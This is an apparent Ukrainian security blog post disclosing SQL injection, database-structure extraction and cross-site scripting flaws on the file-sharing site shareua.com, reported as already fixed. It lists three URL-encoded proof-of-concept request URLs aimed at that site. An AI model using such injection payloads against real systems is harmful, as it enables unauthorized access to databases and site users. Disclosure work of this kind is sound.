Уразливості на shareua.com
19:09 28.04.201019.10.2009
У лютому, 16.02.2009, я знайшов SQL DB Structure Extaction, SQL Injection та Cross-Site Scripting уразливості на сайті http://shareua.com (файлообмінник). Про що найближчим часом сповіщу адміністрацію сайта.
Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.
28.04.2010
SQL DB Structure Extaction:
http://shareua.com/files/show/1/%27
SQL Injection:
http://shareua.com/files/show/1/1%27%20or%20%40%40version%3D5%23
XSS / HTML Injection:
http://shareua.com/files/show/1/%27%3Ch1%3EHacked%3C%2Fh1%3E
Дані уразливості вже виправлені.